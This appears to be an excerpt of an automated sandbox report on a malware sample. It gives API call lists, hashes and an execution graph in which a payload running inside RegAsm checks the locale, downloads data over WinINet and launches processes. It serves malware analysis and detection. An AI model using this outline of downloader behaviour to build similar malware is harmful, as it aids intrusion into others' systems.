                                                                                                                                                                                          • Associated: 00000000.00000002.1338046660.00007FF7D2A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338074142.00007FF7D2A6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7d2a60000_6706e721f2c06.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Window$Text$DesktopDialogForegroundItem
                                                                                                                                                                                          • String ID: Adv
                                                                                                                                                                                          • API String ID: 761066910-921584719
                                                                                                                                                                                          • Opcode ID: db38f3c764be4f10092f313c704ee52b3d278942d11ca53377af995edae986b7
                                                                                                                                                                                          • Instruction ID: 8a23c68f0ea5a3b56c3bbe161cfbc60097e282c0f55c8d13a7c343ed8e46d440
                                                                                                                                                                                          • Opcode Fuzzy Hash: db38f3c764be4f10092f313c704ee52b3d278942d11ca53377af995edae986b7
                                                                                                                                                                                          • Instruction Fuzzy Hash: 7F11E260D08E4286F75C7B55A4086BCEA51EBCAF82FC49136CD0E06394CFBDA447C625
                                                                                                                                                                                          APIs
                                                                                                                                                                                            • Part of subcall function 00007FF7D2A65050: FindResourceA.KERNEL32(?,?,00000000,00007FF7D2A62E43), ref: 00007FF7D2A65078
                                                                                                                                                                                            • Part of subcall function 00007FF7D2A65050: SizeofResource.KERNEL32(?,?,00000000,00007FF7D2A62E43), ref: 00007FF7D2A65089
                                                                                                                                                                                            • Part of subcall function 00007FF7D2A65050: FindResourceA.KERNEL32(?,?,00000000,00007FF7D2A62E43), ref: 00007FF7D2A650AF
                                                                                                                                                                                            • Part of subcall function 00007FF7D2A65050: LoadResource.KERNEL32(?,?,00000000,00007FF7D2A62E43), ref: 00007FF7D2A650C0
                                                                                                                                                                                            • Part of subcall function 00007FF7D2A65050: LockResource.KERNEL32(?,?,00000000,00007FF7D2A62E43), ref: 00007FF7D2A650CF
                                                                                                                                                                                            • Part of subcall function 00007FF7D2A65050: memcpy_s.MSVCRT ref: 00007FF7D2A650EE
                                                                                                                                                                                            • Part of subcall function 00007FF7D2A65050: FreeResource.KERNEL32(?,?,00000000,00007FF7D2A62E43), ref: 00007FF7D2A650FD
                                                                                                                                                                                          • LocalAlloc.KERNEL32(?,?,?,?,00000000,00007FF7D2A63388), ref: 00007FF7D2A64975
                                                                                                                                                                                          • LocalFree.KERNEL32(?,?,?,?,00000000,00007FF7D2A63388), ref: 00007FF7D2A64A11
                                                                                                                                                                                            • Part of subcall function 00007FF7D2A64DCC: LoadStringA.USER32 ref: 00007FF7D2A64E60
                                                                                                                                                                                            • Part of subcall function 00007FF7D2A64DCC: MessageBoxA.USER32 ref: 00007FF7D2A64EA0
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1338008009.00007FF7D2A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D2A60000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1337987550.00007FF7D2A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338028344.00007FF7D2A69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338046660.00007FF7D2A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338074142.00007FF7D2A6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7d2a60000_6706e721f2c06.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Resource$FindFreeLoadLocal$AllocLockMessageSizeofStringmemcpy_s
                                                                                                                                                                                          • String ID: <None>$@$FINISHMSG
                                                                                                                                                                                          • API String ID: 3507850446-4126004490
                                                                                                                                                                                          • Opcode ID: aedc0cb394021a63a9408eb451deeea95bc994a5d044e743d2e3e1f25989d2fa
                                                                                                                                                                                          • Instruction ID: 08c5ab2692d6bbc8b4845a22a25c48ea2b9d516d9cac08a14679b4f4c416ad9a
                                                                                                                                                                                          • Opcode Fuzzy Hash: aedc0cb394021a63a9408eb451deeea95bc994a5d044e743d2e3e1f25989d2fa
                                                                                                                                                                                          • Instruction Fuzzy Hash: 02115372A0CB4386F7246B20A451B7EB650EBD5796FC45136DE4D42684DFBDD005CB18
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1338008009.00007FF7D2A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D2A60000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1337987550.00007FF7D2A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338028344.00007FF7D2A69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338046660.00007FF7D2A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338074142.00007FF7D2A6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7d2a60000_6706e721f2c06.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: LibraryLoad$AttributesFile
                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\$advpack.dll
                                                                                                                                                                                          • API String ID: 438848745-832070840
                                                                                                                                                                                          • Opcode ID: 9f0cd13c1bb279af47be13cee5dd35000d2da7fbef8f0ef7de7ad0cc9ac3dbe3
                                                                                                                                                                                          • Instruction ID: 66e2d0c6adb2fff7e6a3293388e1ad26ea9f9af00f7eccd867b2645420c6ccb5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 9f0cd13c1bb279af47be13cee5dd35000d2da7fbef8f0ef7de7ad0cc9ac3dbe3
                                                                                                                                                                                          • Instruction Fuzzy Hash: C7116F31A28E8295EB25AB10D8406FDB7A0FBD9705FC40233CA5D02691DF7DD60BC714
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1338008009.00007FF7D2A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D2A60000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1337987550.00007FF7D2A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338028344.00007FF7D2A69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338046660.00007FF7D2A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338074142.00007FF7D2A6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7d2a60000_6706e721f2c06.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: BeepDesktopDialogItemLoadMessageStringTextWindow
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 1273765764-0
                                                                                                                                                                                          • Opcode ID: d24c32f5bf32a5b72a732329d1a2a01ce98f5d85b6cb7ead8bb70bc12569425c
                                                                                                                                                                                          • Instruction ID: a7deaf23b7700d624c280760cafa327263e7f24af1fee95c1ae675d435760759
                                                                                                                                                                                          • Opcode Fuzzy Hash: d24c32f5bf32a5b72a732329d1a2a01ce98f5d85b6cb7ead8bb70bc12569425c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 96118161A08E8286EB546B10A4447BDEB60FBC9B56FC48232CE5E063D4CF7CD046C614
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1338008009.00007FF7D2A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D2A60000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1337987550.00007FF7D2A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338028344.00007FF7D2A69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338046660.00007FF7D2A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338074142.00007FF7D2A6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7d2a60000_6706e721f2c06.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: EnumLanguagesMessageResourceVersion$BeepCharCloseMetricsNextOpenQuerySystemValue
                                                                                                                                                                                          • String ID: Adv
                                                                                                                                                                                          • API String ID: 2312377310-921584719
                                                                                                                                                                                          • Opcode ID: 6925faca6a2cd81837304f5f4f2fd7570e59ff5b7a5509a8ec541a78deb6dc36
                                                                                                                                                                                          • Instruction ID: d5bff083d0889a757edd9105f28217691a8df7cacd8bdb336633dba35a2aa733
                                                                                                                                                                                          • Opcode Fuzzy Hash: 6925faca6a2cd81837304f5f4f2fd7570e59ff5b7a5509a8ec541a78deb6dc36
                                                                                                                                                                                          • Instruction Fuzzy Hash: 26A1A531E19A428AF768AB519444A7DE6A5FF84B56FD50037ED0D43280CFBDE847CB28
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1338008009.00007FF7D2A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D2A60000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1337987550.00007FF7D2A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338028344.00007FF7D2A69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338046660.00007FF7D2A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338074142.00007FF7D2A6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7d2a60000_6706e721f2c06.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: File$CloseCreateHandleWrite
                                                                                                                                                                                          • String ID: C:\Users\user\AppData\Local\Temp\IXP000.TMP\
                                                                                                                                                                                          • API String ID: 1065093856-4293232008
                                                                                                                                                                                          • Opcode ID: 0f65b1997a9f98f28a06f8ce24cdc0a961af7feeb94d9fcacdfae0386ba340ac
                                                                                                                                                                                          • Instruction ID: c3a514f50362e1234c86234526decfb3be396ed2706029c49387a087ffae81d0
                                                                                                                                                                                          • Opcode Fuzzy Hash: 0f65b1997a9f98f28a06f8ce24cdc0a961af7feeb94d9fcacdfae0386ba340ac
                                                                                                                                                                                          • Instruction Fuzzy Hash: 9931A332618A8186EB559F10E840BADF7A0FB89795FC44236DE5D47794CFBCD409C714
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1338008009.00007FF7D2A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D2A60000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1337987550.00007FF7D2A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338028344.00007FF7D2A69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338046660.00007FF7D2A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338074142.00007FF7D2A6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7d2a60000_6706e721f2c06.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID: *MEMCAB
                                                                                                                                                                                          • API String ID: 0-3211172518
                                                                                                                                                                                          • Opcode ID: 84e3e731c747766a29489c21773a7ead2eab1f416db6fdf01ae2d5964e993175
                                                                                                                                                                                          • Instruction ID: 16e4d470394b3e47e69d900600fda7fbb4a1cdf8c71e3fecbd0c49cea15bc880
                                                                                                                                                                                          • Opcode Fuzzy Hash: 84e3e731c747766a29489c21773a7ead2eab1f416db6fdf01ae2d5964e993175
                                                                                                                                                                                          • Instruction Fuzzy Hash: A7313921A08F42C5EB58AB11E4486ADB3A0FF84792FD54237DD5D42690EFBCE44AC724
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1338008009.00007FF7D2A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D2A60000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1337987550.00007FF7D2A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338028344.00007FF7D2A69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338046660.00007FF7D2A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338074142.00007FF7D2A6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7d2a60000_6706e721f2c06.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 140117192-0
                                                                                                                                                                                          • Opcode ID: 2331a3b639adea238e9a50b849fe14964fd45a281eaa4897dacf7bdda2e71fe4
                                                                                                                                                                                          • Instruction ID: cef2fbaf107c79f89ff224ae3f35d933060410b0edf414b07b37be5dafda7202
                                                                                                                                                                                          • Opcode Fuzzy Hash: 2331a3b639adea238e9a50b849fe14964fd45a281eaa4897dacf7bdda2e71fe4
                                                                                                                                                                                          • Instruction Fuzzy Hash: B741E425A08F4181EB18AB18E888769F365FBC8B45FD14137DD8D42764DFBCD04AC728
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1338008009.00007FF7D2A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D2A60000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1337987550.00007FF7D2A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338028344.00007FF7D2A69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338046660.00007FF7D2A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338074142.00007FF7D2A6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7d2a60000_6706e721f2c06.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Char$Prev$Next
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 3260447230-0
                                                                                                                                                                                          • Opcode ID: 707050412bb26cc287988f04cda4ab0ae1f580e9279edb24177e5c3a1430149b
                                                                                                                                                                                          • Instruction ID: 6b818058cde7364b3bf340f0716dc34373e0984899345913e38c8c2603a0a336
                                                                                                                                                                                          • Opcode Fuzzy Hash: 707050412bb26cc287988f04cda4ab0ae1f580e9279edb24177e5c3a1430149b
                                                                                                                                                                                          • Instruction Fuzzy Hash: F011A762A1CE8185FB191B11A90057DEB91E789FE2FC98231DE5E03784CFACD442C715
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1338008009.00007FF7D2A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D2A60000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1337987550.00007FF7D2A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338028344.00007FF7D2A69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338046660.00007FF7D2A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338074142.00007FF7D2A6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7d2a60000_6706e721f2c06.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CaptureContextEntryFunctionLookupUnwindVirtual__raise_securityfailure
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 140117192-0
                                                                                                                                                                                          • Opcode ID: f2b1ddacced677a847f8148696c66bf38e9a023ccacb3690f052d0a45ab1694c
                                                                                                                                                                                          • Instruction ID: 3fabc6f41e0f9862ade206e2b6898fb8a9a081fcd2f3397ff812fc1cdbbec059
                                                                                                                                                                                          • Opcode Fuzzy Hash: f2b1ddacced677a847f8148696c66bf38e9a023ccacb3690f052d0a45ab1694c
                                                                                                                                                                                          • Instruction Fuzzy Hash: 1C21A035909F4285E708AB54E888B69F3A5FB88B46FD10037DE8D42764DFBDD146C728
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000000.00000002.1338008009.00007FF7D2A61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00007FF7D2A60000, based on PE: true
                                                                                                                                                                                          • Associated: 00000000.00000002.1337987550.00007FF7D2A60000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338028344.00007FF7D2A69000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338046660.00007FF7D2A6C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          • Associated: 00000000.00000002.1338074142.00007FF7D2A6E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_0_2_7ff7d2a60000_6706e721f2c06.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Message$Peek$DispatchMultipleObjectsWait
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID: 2776232527-0
                                                                                                                                                                                          • Opcode ID: 7c1b033473dba301dd4ecd47eb6d04f722b5b1254afffa929906cb3dfbdd32c6
                                                                                                                                                                                          • Instruction ID: 1745d7c37c6ce93d239fc7d7bf1b2e0dcb43e08fc6bdf85cbaff8864fb9e96e5
                                                                                                                                                                                          • Opcode Fuzzy Hash: 7c1b033473dba301dd4ecd47eb6d04f722b5b1254afffa929906cb3dfbdd32c6
                                                                                                                                                                                          • Instruction Fuzzy Hash: CB115872A1CA4387E7646F20E444E7EEA90FBD5B46FC09132DE4A42984DF7DD04ACB14
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000005.00000002.2491696316.00007FF886EE0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF886EE0000, based on PE: false
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_5_2_7ff886ee0000_powershell.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID:
                                                                                                                                                                                          • String ID:
                                                                                                                                                                                          • API String ID:
                                                                                                                                                                                          • Opcode ID: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                                                                                          • Instruction ID: fb6f1e2f2d28b8e5ca31a0a4f361fee78b88f8db5d1408cf96b74fefd2faf106
                                                                                                                                                                                          • Opcode Fuzzy Hash: 582908582f657131c1f04ed76f34d09c60f6b2c2f8b724a61ceffa3ac25bcdd6
                                                                                                                                                                                          • Instruction Fuzzy Hash: 5801677111CB0D8FD744EF0CE455AA6B7E0FB99364F10056DE58AC3691D636E882CB46

                                                                                                                                                                                          Execution Graph

                                                                                                                                                                                          Execution Coverage:3.6%
                                                                                                                                                                                          Dynamic/Decrypted Code Coverage:0%
                                                                                                                                                                                          Signature Coverage:23.7%
                                                                                                                                                                                          Total number of Nodes:59
                                                                                                                                                                                          Total number of Limit Nodes:9
                                                                                                                                                                                          execution_graph 7709 401170 7710 40117c 7709->7710 7711 409050 13 API calls 7710->7711 7712 401396 7710->7712 7711->7712 7647 4013d1 7649 4011ea 7647->7649 7648 401396 7649->7648 7651 409050 7649->7651 7652 409072 7651->7652 7669 401580 CoInitializeEx 7652->7669 7654 409089 7676 4019c0 7654->7676 7656 4090d5 7679 401ab0 InternetOpenA 7656->7679 7658 409125 7690 401d60 7658->7690 7660 409199 7661 401d60 InternetReadFile 7660->7661 7662 4091a9 7661->7662 7694 402020 CreateProcessA 7662->7694 7664 4091b1 7665 402020 CreateProcessA 7664->7665 7666 4091b9 7665->7666 7696 402130 7666->7696 7668 4091e9 7668->7648 7670 4015bf CoInitializeSecurity 7669->7670 7671 401858 7669->7671 7670->7671 7672 401617 7670->7672 7671->7654 7672->7671 7673 4016a6 CoSetProxyBlanket 7672->7673 7673->7671 7675 4016f6 7673->7675 7674 4018a2 CoUninitialize 7674->7654 7675->7671 7675->7674 7677 4019c9 GetLocaleInfoA 7676->7677 7678 4019f8 7677->7678 7678->7656 7680 401af2 InternetConnectA 7679->7680 7683 401ca8 7679->7683 7681 401b42 7680->7681 7685 401cd0 7680->7685 7682 401b90 HttpSendRequestA 7681->7682 7687 401d20 7681->7687 7684 401bc4 InternetReadFile 7682->7684 7689 401c40 7682->7689 7683->7658 7686 401bf0 7684->7686 7684->7689 7685->7658 7688 401c1a InternetCloseHandle 7686->7688 7687->7658 7688->7689 7689->7658 7691 401d6e 7690->7691 7692 401e68 7691->7692 7693 401e44 InternetReadFile 7691->7693 7692->7660 7693->7691 7693->7692 7695 4020be 7694->7695 7695->7664 7697 40218d 7696->7697 7698 4022e0 7697->7698 7699 4022b2 InternetCloseHandle 7697->7699 7698->7668 7700 4022c5 7699->7700 7700->7668 7701 401e19 7702 401e20 7701->7702 7703 401e44 InternetReadFile 7702->7703 7704 401e68 7702->7704 7703->7702 7703->7704 7713 40117c 7714 401396 7713->7714 7715 4011a0 7713->7715 7715->7714 7716 409050 13 API calls 7715->7716 7716->7714

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.1530325114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Internet$CloseConnectFileHandleHttpOpenReadRequestSend
                                                                                                                                                                                          • String ID: P
                                                                                                                                                                                          • API String ID: 407532477-3110715001
                                                                                                                                                                                          • Opcode ID: 68d6e46f0074e74a1225d143d4fcd1a7219077e7ca9cb7b43b3ff30fd60a8fd4
                                                                                                                                                                                          • Instruction ID: 868ca2e84ca83502d30d90bc9f04e5aa65ebf759507aee97834f377957ff4854
                                                                                                                                                                                          • Opcode Fuzzy Hash: 68d6e46f0074e74a1225d143d4fcd1a7219077e7ca9cb7b43b3ff30fd60a8fd4
                                                                                                                                                                                          • Instruction Fuzzy Hash: 0C51E7B15093059FE710BF69E54835FBBE0EF80354F01897EE4999B290E7B99488CB87

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 134 4019c0-4019f6 GetLocaleInfoA 136 401a00-401a1e call 401520 134->136 137 4019f8-4019fb 134->137
                                                                                                                                                                                          APIs
                                                                                                                                                                                          • GetLocaleInfoA.KERNEL32(?,?,?,?,?,?,004090D5), ref: 004019E7
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.1530325114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: InfoLocale
                                                                                                                                                                                          • String ID: Y
                                                                                                                                                                                          • API String ID: 2299586839-3233089245
                                                                                                                                                                                          • Opcode ID: 15928d0808fc750c131f392b65d3bb41f0fbd59121a5b8c4f5e090989085ffba
                                                                                                                                                                                          • Instruction ID: 932d750706aa9a35d8c3dfa946d6b77407d2737a95e99fdf0bb275470638456c
                                                                                                                                                                                          • Opcode Fuzzy Hash: 15928d0808fc750c131f392b65d3bb41f0fbd59121a5b8c4f5e090989085ffba
                                                                                                                                                                                          • Instruction Fuzzy Hash: A1F012B89057019FC300BF29D94922A7AE0BBC8305F90C9ADF88897355E778C9448F47

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.1530325114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: Initialize$BlanketProxySecurityUninitialize
                                                                                                                                                                                          • String ID: 0$h@
                                                                                                                                                                                          • API String ID: 65014260-1742305446
                                                                                                                                                                                          • Opcode ID: 787f4c05d705ba5fc5f895316f148ad968491b9388b0725d51fa138908bccda5
                                                                                                                                                                                          • Instruction ID: c05d372046367d64a110838afc58b0079e360e107e8b0d8797b5e9bbc6725ecc
                                                                                                                                                                                          • Opcode Fuzzy Hash: 787f4c05d705ba5fc5f895316f148ad968491b9388b0725d51fa138908bccda5
                                                                                                                                                                                          • Instruction Fuzzy Hash: 6EA19EB15083019FD300EF69D55871FBBF0FB85348F008A2DE5999B2A0D7BAD5898B96

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          APIs
                                                                                                                                                                                          • InternetCloseHandle.WININET ref: 004022BB
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.1530325114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CloseHandleInternet
                                                                                                                                                                                          • String ID: P
                                                                                                                                                                                          • API String ID: 1081599783-3110715001
                                                                                                                                                                                          • Opcode ID: 5b3d054767ee2cd4e09604fd37bff2b0360d55ee45059c402eb6bd3024946649
                                                                                                                                                                                          • Instruction ID: 05fe1e79c7ed6e1bc9763c81c2f6d27f6384bcb5cfe1c159b77d827785a1ba4f
                                                                                                                                                                                          • Opcode Fuzzy Hash: 5b3d054767ee2cd4e09604fd37bff2b0360d55ee45059c402eb6bd3024946649
                                                                                                                                                                                          • Instruction Fuzzy Hash: 2151C6B15093059FD710BF69E94835FBBE0EB84314F01893EE4D99B291E7B98588CB87

                                                                                                                                                                                          Control-flow Graph

                                                                                                                                                                                          • Executed
                                                                                                                                                                                          • Not Executed
                                                                                                                                                                                          control_flow_graph 125 402020-4020bc CreateProcessA 126 402100-402123 call 401520 125->126 127 4020be-4020fe 125->127
                                                                                                                                                                                          APIs
                                                                                                                                                                                          Strings
                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                          • Source File: 00000009.00000002.1530325114.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                          • Snapshot File: hcaresult_9_2_400000_RegAsm.jbxd
                                                                                                                                                                                          Similarity
                                                                                                                                                                                          • API ID: CreateProcess
                                                                                                                                                                                          • String ID: D
                                                                                                                                                                                          • API String ID: 963392458-2746444292
                                                                                                                                                                                          • Opcode ID: 44221f7b4e265c41f2935e7b4c25c678cc73ef3de100360b2a151b24d561215f
                                                                                                                                                                                          • Instruction ID: 3a383f400f1f68bfccf5aab4b18dd6a9efa615ca680d184d01b09d21f929c915
